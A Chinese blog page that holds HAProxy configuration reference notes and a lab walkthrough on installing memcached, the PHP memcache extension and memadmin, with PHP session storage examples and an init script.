用于在负载均衡场景中挑选一个server,其仅应用于持久信息不可用的条件下或需要将一个连接重新派发至另一个服务器时,支持的算法有:

  • roundrobin:基于权重进行轮叫,在服务器的处理时间保持均匀分布时,这是最平衡,公平的算法,此算法是动态的,这表示其权重可以在运行时进行调整,不过,在设计上,每个后端服务器仅能最多接收4128的个连接;
  • static-rr:基于权重进行轮叫,与roundrobin类似,但是为静态方法,在运行时调整其服务器权重不会生效,不顾,在后端服务器连接数上没有限制;
  • leastconn:新的连接请求被派发至具有最少连接数目的后端服务器,在有着较长时间会话的场景中推荐使用此算法,如LDAP,SQL等,其并不太适用于较短会话的应用层协议,如HTTP;此算法是动态的,可以在运行时调整其权重;
  • source:将请求的源地址进行hash运算,并由后端服务器的权重总和相除后派发至某匹配的服务器,这可以使得同一个客户端IP的请求始终被派发至某特定的服务器,不过,当服务器权重总数发生变化时,如某服务器宕机或添加了新的服务器,许多客户端的请求可能会被派发至此前请求不同的服务器:常用于负载均衡无cookie功能的基于TCP的协议,默认为静态,不过也可以使用hash-type修改此特性;
  • uri:对URI的左半部分(“问题”标记之前的部分)或整个URI进行hash计算,并有服务器的总权重相除后派发至某匹配的服务器,这可以使得对同一个URI的请求总是被派发至某特定的服务器,除非服务器的权重总数发生了变化,此算法常用于代理缓存或反病毒代理以提高缓存的命中率,需要注意的是,此算法仅应用于hTTP后端服务器的场景,其默认为静态算法,不过也可以使用hash-type修改此特性;
  • url_param:通过为指定的参数在每个HTTPGET请求中将会被检索,如果找到了指定的参数且其通过等于号”=”被赋予了一个值,那么此值被执行hash运算并被服务器的总权重相除后派发至某匹配的服务器,此算法可以通过追踪请求中的用户标识进而确保同一个用户ID的请求将被送往同一个特定的服务器,除非服务器的总权重发生了变化,如果某请求中没有出现制定的参数或没有有效值,则使用轮叫算法对响应请求进行调度:此算法默认是静态的,不过其也可以使用hash-type修改此特性;
  • hdr():对于每个HTTP请求,通过指定的HTTP首部将会被检索,如果相应的首部没有出现或其没有有效值,则使用轮叫算法对响应请求进行调度,其有一个可选选项”use_domain_only”,可在制定检索类似host类的首部时仅计算域名部分(比如通过www.test.com来说,仅计算test字符串的hash值)以降低hash算法的运算量,此算法默认为静态的,不过其也可以使用hash-type修改此特性;
  • rdp-cookie
  • rdp-cookie(name)
  1. bind
    bind [
    ]:[,…] interface
    此指令仅能用于fronend和listen区段,用于定义一个或几个监听的套接字;

 

  • :可选选项,其可以为主机名、IPv4、ipv6地址或*,省略此选项,将其指定为*或0.0.0.0时,将监听当前系统的所有IPv4地址;
  • :可以是一个特定的TCP端口,也可是一个端口范围(如5005-5010),代理服务器将通过指定的端口来接收客户端请求,需要注意的是,每组监听的套接字address:port在同一个实例上只能使用一次,而且小于1024的端口需要有特定权限的用户才能使用,这可能需要通过uid参数来定义;
  • :制定物理接口的名称,仅能在Linux系统上使用,其不能使用接口别名,而仅能物理接口名称,而且只能管理有权限指定绑定的物理接口;
  1. mode
    mode {tcp|http|health}
    设定实例的运行模式或协议,当实现内容交换时,前端和后端必须工作于同一种模式(一般说都是http模式),否则将无法启动实例;
  • tcp:实例运行于纯TCP模式,在客户端和服务器端之间建立一个全双工的连接,且不会对7层报文做任何类型的检查,此为默认模式,通常用于SSL,SSH,SMTP等应用;
  • http:实例运行于HTTP模式,客户端请求在转发至后端服务器之前将被深度分析,所有不与RFC格式兼容的请求都被拒绝;
  • health:实例工作于health模式,其对入站请求仅响应”OK”信息并关闭连接,且不会记录任何日志信息,此模式将用于响应外部组件的健康状态检查请求,目前来讲,此模式已经废弃,因为tcp或http模式中的monitor关键字可完成类似功能;
  1. hash-type

hash-type

定义用于将hash码映射至后端服务器的方法,其不恩能够用于frontend区段,可用方法有map-based和consistent,在大多数场景下推荐使用默认的map-based方法;

  • map-based:hash表是一个包含了所有在线服务器的静态数组,其hash值将会非常平滑,会将权重考虑在列,但其为静态方法,对在线服务器的权重进行调整并不会生效,这意味着其部支持慢速启动,此外,挑选服务器是根据是根据其在数组中的位置进行的,因此,当一台服务器宕机或添加了一台服务器时,大多数连接将会被重新派发至一个此前不同的服务器上,对于缓存服务器的工作场景来说,此方法不甚适用;
  • consistent:hash表是一个由各服务器填充而成的树状结构,基于hash键在hash树中查找相应的服务器时,最近的服务器将被选中,此方法是动态的,支持在运行时修改服务器权重,因此兼容慢速启动的特性,添加一个新的服务器时,仅会对一小部分请求产生影响,因此,尤其适用于后端服务器为cache的场景,不过此算法平滑,派发至各服务器的请求未必达到理想的均衡效果,因此,可能需要不时的调整服务器的权重以获得更好的均衡性;
  1. log

    log global
    log

    [[]]
    为每个实例启用时间和流量日志,因此可用于用于区段,每个实例最多可以指定两个log参数,不过,如果使用了”log global”且”global”段已经定义了两个log参数时,多余了log参数将被忽略;

  • global:的拿钱实例的日志系统参数同”global”端中的定义时,将使用此格式:每个实例仅能定义一次”log global”语句,且其没有任何额外参数;
  • :定义日志发往的位置,其格式之一可以为,其中的port为UDP协议端口,默认为514,格式之二为unix套接字文件路径,单需要留心chroot应用及用户的读取权限;
  • :可以为syslog系统的标准facility之一;
  • :定义日志级别,即输出信息过滤器,默认为所有信息,指定级别时,所有等于或高于此级别的日志信息将会被发送;
  1. maxconn

maxconn

设定一个前端的最大并发连接数,因此,其不能用于backend区段,对于大型站点来说,可以尽可能调大此值以便让haproxy管理连接队列,从而避免无法应答用户请求。当然,此最大值不能超出”global”段中的定义。此外,需要留心的是,haproxy会为每个连接维持两个缓冲,每个缓冲的大小为8KB,再加上其他的数据,每个连接将大约占用17KB的RAM空间。这意味着经过适当优化后,有着1GB的可用RAM空间将能维护40000-50000并发连接。

如果为指定了一个过大值,极端情况下,其最终占据的空间将会超出当前主机的可用内存,这可能带来意想不到的结果,因此,将其设定了一个可接受值为明智选择,其默认为2000;

  1. default_backend

default_backend

在没有匹配的”use_backend”规则时为实例指定使用的默认后端,因此,其不可应用于backend区段,在”frontend”和”backend”之间进行内容交换时,通常使用”use_backend”定义其匹配规则,而没有被规则匹配到的请求将有此参数指定的后端接收。

:指定使用的后端的名称:
使用案例:

use_backend dynamic if url_dyn
use_backend static if url_css url_img extension_img
default_backend dynamic

  1. server

server

:port

为后端声明一个server,因此,不能够用于defaults和frontend区段

  • :为此服务器指定的内部名称,其将会出现在日志及警告信息中,如果设定了”http-send-server-name”,它还将被添加至发往此服务器的请求首部中;
  • :此服务器的IPv4地址,也支持使用可解析的主机名,只不过在启动时需要解析主机名至相应的IPv4地址;

服务器或默认服务器参数:

  • backup:设定为备用服务器,仅在负载均衡场景中的其他server均不可用于启用此server;
  • check:启动对此server执行健康状态检查,其可以借助于额外的其他参数完成更精细的设定,如:

    inter :设定健康状态检查的时间间隔,单位为毫秒,默认为2000,也可以使用fastinter和downinter来根据服务器端状态优化此时间延迟;
    rise :设定健康状态检查中,某离线的server从离线状态转至正常状态需要成功检查的次数;
    fall :确认server从正常状态转换为不可用状态需要检查的次数;

  • cookie :为指定server设定cookie值,此处指定的值将在请求入站时被检查,第一次为此值挑选的server将在后续的请求中被选中,其目的在于实现持久连接的功能;
  • maxconn :指定此服务器接受的最大并发连接数,如果发往此服务器的连接数目高于此处指定的值,其将被放置于请求队列,以等待其他连接被释放;
  • maxqueue :设定请求队列的最大长度;
  • observe :用过观察服务器的通信状况来判定其健康状态,默认为禁用,其支持的类型有layer4和layer7,layer7仅能用于http代理场景;
  • redir :启用重定向功能,将发往此服务器的GET和HEAD请求均已302状态码响应,需要注意的是,在prefix后面不能使用/,且不能使用相对地址以免造成循环,例如:

    server srv1 172.16.100.6:80 redir http://www.test.com check

  • weight :权重,默认为1,最大值为256,0表示不参与负载均衡;

检查方法:

option httpchk
option httpchk
opeion httpchk
option httpchk ,不能用于frontend段,例如:

backend https_relay
mode tcp
option httpchk OPTIONS * HTTP/1.1\r\nHost:\ www
server apache1 192.168.1.1:443 check port 80

使用案例;

server first 172.16.100.7:1080 cookie first check inter 1000
server second 172.16.100.8:1080 cookie second check inter 1000

  1. capture request header

capture request header len

捕获并记录指定的请求首部最近一次出现时的第一个值,仅能用于”frontend”和”listen”区段,捕获的首部值使用花括号{}括起来后添加进日志中。如果需要捕获多个首部值,他们将以指定的次序出现在日志文件中,并以竖线”|”作为分隔符。不存在的首部记录为空字符串,最常需要捕获的首部包括在虚拟主机环境中使用的”Host”、上传请求首部中的”Content-length”、快速区别真实用户和网络机器人的”User-agent”,以及代理环境中记录真实请求来源的”X-Forward-For”。

  • :要捕获的首部的名称,此名称不区分字符大小写,但建议与他们出现在首部中的格式相同,比如大写首字母,需要注意的是,记录在日志中的是首部对应的值,而非首部名称。
  • :指定记录首部的个数没有限制,但每个捕获最多只能记录64个字符。为了保证同一个frontend中日志格式的统一性,首部捕获仅能在frontend中定义;
  1. capture response header

capture response header len
捕获并记录响应首部,其格式和药店同请求首部。

  1. stats enable

启用基于程序编译时默认设置的统计报告,不能用于”frontend”区段。只要没有别外的其他设定,他们就会使用如下的配置:

  • stats uri : /haproxyadmin?stats
  • stats realm : “HAProxy Statistics”
  • stats auth : no authentication
  • stats scope : no restriction

尽管”stats enable”一条就能够启用统计报告,但还是建议设定其他所有的参数,以免其依赖于默认设定而带来非期后果,下面是一个配置案例:

1
2
3
4
5
6
7
8
9
backend public_www
    server websrv1 172.16.100.11:80
    stats enable
    stats hide-version
    stats scope
    stats uri       /haproxyadmin?stats
    stats realm Haproxy\ Statistics
    stats auth    statsadmin:password
    stats auth    statsmaster:password
  1. stats hide-version

stats hide-version

启用统计报告并隐藏HAProxy版本报告,不能用于”frontend”区段,默认情况下,统计页面会显示一些游泳信息,包括HAProxy的版本号,然后,向所有人公开HAProxy的精确版本号是非常有风险的,因为他能帮助恶意用户快速定为版本的缺陷和漏洞,尽管”stats hide-version”一条就能够启用统计报告,但还是建议设定其他所有的参数,以免其依赖于默认设定而带来非期后果,具体请参照”stats enable”一节的说明。

  1. stats realm

stats realm

启用统计报告并高精认证领域,不能用于”frontend”区段,haproxy在读取realm时会将其视作一个单词,因此,中间的任何空白字符都必须使用反斜线进行转义,此参数仅在于”stats auth”配置使用时有意义。

:实现HTTP基本认证时显示在浏览器中的领域名称,用于提示用户输入一个用户名和密码。

尽管”stats realm “ 一条就能够启用统计报告,但还是建议设定其他所有的参数,以免其依赖于默认设定而带来非期后果,具体请参照”stats enable”一节的说明。

  1. stats scope

stats scope { | “ . “}

启用统计报告并限定报告的区段,不能用于”frontend”区段,当指定此语句时,统计报告将仅显示其列举出区段的报告信息,所有其他区段的信息将被隐藏。如果需要显示多个区段的统计报告,此语句可以定义多次。需要注意的是,区段名称检测仅仅是以字符串比较的方式进行,他不会真检测指定的区段是否真正存在。

:可以是一个”listen”、”frontend”或”backend”区段的名称,而”.”则表示stats scope语句所定义的当前区段。

尽管”stats scope”一条就能够启用统计报告,但还是建议设定其他所有的参数,以免其依赖于默认设定而带来非其后果。下面是一个配置案例。

1
2
3
4
backend private_monitoring
    stats enable
    stats uri  /haproxyadmin?stats
    stats refresh 10s
  1. stats auth

stats auth :

启用带认证的统计报告功能并授权一个用户账号,其不能用于”frontend”区段。

:授权进行访问的用户名;
:此用户的访问密码,明文格式。

此语句将基于默认设定启用统计报告功能,并仅允许其定义的用户访问,其也可以定义多次以授权多个用户找好,尅结合”stats realm”参数在提示用户认证是给出一个领域说明信息,在使用非法用户访问统计功能时,其将会响应一个”401 Forbidden”页面。其认证方式为HTTP Basic认证,密码传输会以明文方式进行,因此,配置文件中也使用明文方式进行,因此,配置文件中也使用明文方式存储以说明其非保密信息故此不能相同于其他关键性账号的密码。

尽管”stats auth”一条就能够启用统计报告,但还是建议设定其他所有的参数,以免其依赖于默认设定而代理非期后果。

  1. stats admin

stats admin {if | unless}

在指定的条件满足时启用统计报告页面的管理级别功能,它允许通过web接口启用或禁用服务器,不过,基于安全的角度考虑,统计高博爱页面应该尽可能是只读的。此外,如果启用了HAProxy的多进程模式,启用此管理级别将有可能导致异常行为。

目前来说,POST请求方法被限制于金恩能够使用缓冲区域去保留部分之外的空间,因此,服务器列表不能过长,否则,此请求将无法正常工作,因此,建议一次仅调整少数几个服务器,下面是两个案例,第一个限制了仅能在本机打开报告页面时启用管理级别功能,第二个定义了仅允许通过认证的用户使用管理级别功能。

1
2
3
4
5
6
7
8
backend stats_localhost
    stats enable
    stats admin if LOCALHOST

backend stats_auth
    stats enable
    stats auth haproxyadmin:password
    stats admin if TRUE
  1. option httplog

option httplog [clf]
启用记录HTTP请求,会话状态和计时器的功能。

clf:使用CLF格式来代替HAProxy默认的HTTP格式,通常在使用仅支持CLF格式的特定日志分析器时才需要使用此格式。

默认情况下,日志输入格式非常简陋,因为其仅包含源地址、目标地址和实例名称,而”option httplog”参数将会使得日志格式变得丰富许多,其通常包括但不限于HTTP请求、连接计时器、会话状态、连接数、捕获的首部及cookie、”frontend”、”backend”及服务器名称,当然也包括源地址和端口号等。

  1. option logasap

    no option logasap
    启用或禁用提前将HTTP请求记入日志,不能用于”backend”区段。

默认情况下,HTTP请求是在请求结束时金牛星记录一百年能就爱你勾起整体传输时长和字节数记入日志,由此,传较大的对象时,其记入日志的时长可能会略有延迟。”option logasap”参数能够在服务器发送complete首部时及时记录日志,只不过,此时将不记录整体传输时长和字节数。此情形下,捕获”Content-Length”响应首部来记录传输的字节数是一个较好选择。下面是一个例子.

1
2
3
4
5
listen http_proxy 0.0.0.0:80
    mode http
    option httplog
    option logasap
    log 172.16.100.9 local2
  1. option forwardofor

option forwardfor [except ] [header ] [if-none]

允许在发往服务器的请求首部中插入”X-Forwarded-For”首部。

:可选选项,当指定时,源地址为匹配至此网络中的请求都禁用此功能。
:可选参数,可使用一个自定义的首部,如”X-Client”来替代”X-Forwarded-For”,有些独特的web服务器的确需要用于一个独特的首部。
if-none:仅在此首部不存在时才将其添加至请求报文中。

HAProxy工作于反向代理模式,其发往服务器的请求中的客户端IP均为HAProxy主机的地址而非真正客户端的地址,这会使得服务器端的日志信息记录不了真正的请求来源,”X-Forwarded-For”首部则可用于解决此问题,HAProxy可以向每个发往服务器的请求上添加此首部,并以客户端IP为其value。

需要注意的是,HAProxy工作于隧道模式,其仅检查每一个连接的第一个请求,因此,仅第一个请求报文被附加此首部,如果想为每一个请求都附加此首部,请确保同时使用了”option httpclose”、”option forceclose”和”option http-server-close”几个option。

下面是一个例子:

frontend www
mode http
option forwardfor except 127.0.0.1

  1. errorfile

    errorfile

在用户请求不存在的页面时,返回一个页面文件给客户端而非有haproxy生成的错误代码,可用于所有段中;

:指定对HTTP的哪些状态码返回指定的页面,这里可用的状态码有200,400,403,408,500,502,503和504;
:指定用于响应的页面文件:

例如:

errorfile 400 /etc/haproxy/errorpages/400badreq.http
errorfile 403 /etc/haproxy/errorpages/403forbid.http
errorfile 503 /etc/haproxy/errorpages/503sorry.http

  1. errorloc 和 errorloc302

errorloc
errorloc302

请求错误时,返回一个HTTP重定向至某URL的信息,可用于所有配置段中。

:指定对HTTP的哪些状态码返回指定的页面,这里可用的状态码有200、400、403、408、500、502、503和504;

:Location首部中指定的页面位置的具体路径,可以是在当前服务器上的页面的相对路径,也可以使用绝对路径,需要注意的是,如果URI自身错误时产生某特定状态码信息的话,有可能会导致循环定向;

需要留意的是,这两个关键字都会返回302状态码,这将使得客户端使用同样的HTTP方法获取指定的URL,对于非GET的场景中(如POST)来说会产生问题,因为返回客户的URL是不允许使用GET以外的其他方法的。如果的确有这种问题,可以使用errorloc303来返回303状态码给客户端。

  1. errorloc 303

errorloc 303

请求错误时,返回一个HTTP重定向至某URL的信息给客户端:可用于所有配置段中。

:指定对HTTP的那些状态码返回指定的页面,这里可用的状态码有400,403,408,500,502,504;
:Location首部中指定的页面位置的具体路径,可以是在当前服务器上的页面的相对路径,也可以使用绝对路径,需要注意的是,如果URI自身错误时产生某特定状态码信息的话,有可能会导致循环定向;

例如:

1
2
3
4
5
6
backend webserver
    server 172.16.100.6  172.16.100.6:80 check maxconn 3000 cookie srv01
    server 172.16.100. 7 172.16.100.7:80 check maxconn 3000 cookie srv02
    errorloc 403 /etc/haproxy/errorpages/sorry.htm
    errorloc 503 /etc/haproxy/errorpages/sorry.htm

展开全文 >>

44_03_2_实验:memcached安装配置

环境介绍:

192.168.122.14 node2.test.com     memcached服务器
192.168.122.7    nfs.test.com           LNMP环境

编译安装memcached

  1. 编译安装libevent
1
2
3
4
[root@node2 ~]# tar xf libevent-2.0.22-stable.tar.gz 
[root@node2 ~]# cd libevent-2.0.22-stable 
[root@node2 libevent-2.0.22-stable]# ./configure --prefix=/usr/local/libevent 
[root@node2 libevent-2.0.22-stable]# make && make install
  1. 编译安装memcached
1
2
3
4
5
[root@node2 ~]# yum -y install  cyrus-sasl-devel 
[root@node2 ~]# tar xf memcached-1.4.24.tar.gz 
[root@node2 ~]# cd memcached-1.4.24 
[root@node2 memcached-1.4.24]# ./configure --prefix=/usr/local/memcached --with-libevent=/usr/local/libevent --enable-sasl --enable-64bit 
[root@node2 memcached-1.4.24]# make && make install

  1. 提供启动脚本和系统配置文件 

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    [root@node2 memcached-1.4.24]# useradd -r memcached 
    [root@node2 memcached-1.4.24]# vim /etc/sysconfig/memcached 
    PORT="11211" 
    USER="memcached" 
    MAXCONN="1024" 
    CACHESIZE="64" 
    OPTIONS="" 
     
    [root@node2 memcached-1.4.24]# vim /etc/rc.d/init.d/memcached 
    [root@node2 memcached-1.4.24]# chmod +x /etc/rc.d/init.d/memcached 
    [root@node2 memcached-1.4.24]# service memcached start

  2. 测试

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
telnet localhost 11211 
stats 
可以看到内存限制大小为64M: 
STAT limit_maxbytes 67108864 
 
修改配置文件,将其改为128M 
[root@node2 memcached-1.4.24]# vim /etc/sysconfig/memcached 
PORT="11211" 
USER="memcached" 
MAXCONN="1024" 
CACHESIZE="128" 
OPTIONS="" 
 
再次进行查看: 
STAT limit_maxbytes 134217728

这个时候已经完成memcached的安装;;

安装PHP的memcache扩展

前提:已经完成LNMP平台的搭建 

1
2
3
4
5
6
7
8
[root@nfs ~]# tar xf memcache-2.2.7.tgz 
[root@nfs ~]# cd memcache-2.2.7 
[root@nfs memcache-2.2.7]# /usr/local/php/bin/phpize 
[root@nfs memcache-2.2.7]# ./configure --with-php-config=/usr/local/php/bin/php-config --enable-memcache 
[root@nfs memcache-2.2.7]# make && make install 
[root@nfs memcache-2.2.7]# vim /etc/php.d/memcache.ini 
extension=memcache.so 
[root@nfs memcache-2.2.7]# service php-fpm restart

测试:

  • 确保php-fpm已经能够正确启用memcache模块:
1
2
3
<?php 
        phpinfo(); 
?> 
1
service php-fpm restart
  • 对memcached进行连接测试
1
2
3
4
5
6
7
8
9
10
11
12
13
<?php 

$mem = new Memcache; 
$mem->connect("192.168.122.14",11211) or die ("Could not connect"); 
$version = $mem->getVersion(); 
echo "Server's version: ".$version."<br/>\n"; 
 
$mem->set('testkey','hello world',0,600) or die("Failed to save data at the memcached server"); 
echo "Store data in the cache (data will expire in 600 seconds)<br/>\n"; 
 
$get_result = $mem->get('testkey'); 
echo "get_result is from memcached server."; 
?>

配置PHP将会话保存至memcached中

1
2
3
4
5
6
[root@nfs html]# vim /etc/php.ini 
 
session.save_handler = memcache 
session.save_path = "tcp://192.168.122.14:11211?persistent=1&weight=1&timeout=1&retry_interval=15" 
 
[root@nfs html]# service php-fpm restart
  • 测试

新建php页面setsess.php,为客户端设置启用session: 

1
2
3
4
5
6
7
8
9
<?php 
session_start(); 
if (!isset($_SESSION['www.test.com'])){ 
    $_SESSION['www.test.com'] = time(); 
} 
print $_SESSION['www.test.com']; 
print "<br><br>"; 
print "Session ID: " . session_id(); 
?>

新建php页面showsess.php,获取当前用户的会话ID: 

1
2
3
4
5
6
7
8
9
<?php 
session_start(); 
$memcache_obj = new Memcache; 
$memcache_obj->connect('192.168.122.14',11211);     测试时注意IP地址; 
$mysess=session_id(); 
var_dump($memcache_obj->get($mysess)); 
$memcache_obj->clost(); 
?>

memadmin图形化工具安装

1
2
3
4
5
[root@nfs ~]# tar xf memadmin-1.0.12.tar.gz 
[root@nfs ~]# cp -r memadmin /usr/html/memadmin 
[root@nfs ~]# cd /usr/html/memadmin/ 
[root@nfs memadmin]# vim config.php   修改用户名和密码

访问:
http://192.168.122.7/memadmin/index.php
添加memcached主机即可进行监控;;

需要说明:在前一节,Nginx配置使用memcached的缓存时,没有配置成功。额,也没看懂;;

memcached启动脚本

1
# vim /etc/rc.d/init.d/memcached 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
#!/bin/sh 
#config: /etc/sysconfig/memcached 
#chkconfig: 2345 55 45 
. /etc/rc.d/init.d/functions 
 
##Default variables 
PORT="11211" 
USER="memcached" 
MAXCONN="1024" 
CACHESIZE="64" 
OPTIONS="" 
 
RETVAL=0 
prog="/usr/local/memcached/bin/memcached" 
desc="Distributed memory caching" 
lockfile="/var/lock/subsys/memcached" 
 
if [ -f /etc/sysconfig/memcached ];then 
    . /etc/sysconfig/memcached 
fi 
. /etc/sysconfig/network 
if [ "$NETWORKING" = "no" ];then 
    exit 0 
fi 
start(){ 
    echo -n $"Starting $desc (memcached): " 
    daemon $prog -d -p $PORT -u $USER -c $MAXCONN -m $CACHESIZE $OPTIONS 
    RETVAL=$? 
    echo 
    [ $RETVAL -eq 0 ] && touch $lockfile 
    return $RETVAL 
} 
 
stop(){ 
    echo -n $"Shutting down $desc (memcached): " 
    killproc $prog 
    RETVAL=$? 
    echo 
    [ $RETVAL -eq 0 ] && rm -f $lockfile 
    return $RETVAL 
} 
 
restart(){ 
    stop 
    start 
} 
 
reload(){ 
    echo -n $"Reloading $desc ($prog): " 
    killproc $prog -HUP 
    RETVAL=$? 
    echo 
    return $RETVAL 
} 
 
case "$1" in 
    start) 
        start 
        ;; 
    stop) 
        stop 
        ;; 
    restart) 
        restart 
        ;; 
    reload) 
        reload 
        ;; 
    status) 
        status $prog 
        RETVAL=$? 
        ;; 
    *) 
        echo  $"Usage: $0 {start|stop|restart|condrestart|status}" 
        RETVAL=1 
esac 
exit $RETVAL 
 
# chmod +x /etc/rc.d/init.d/memcached 
# chkconfig --add memcached

展开全文 >>

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

探索世界美好的存在。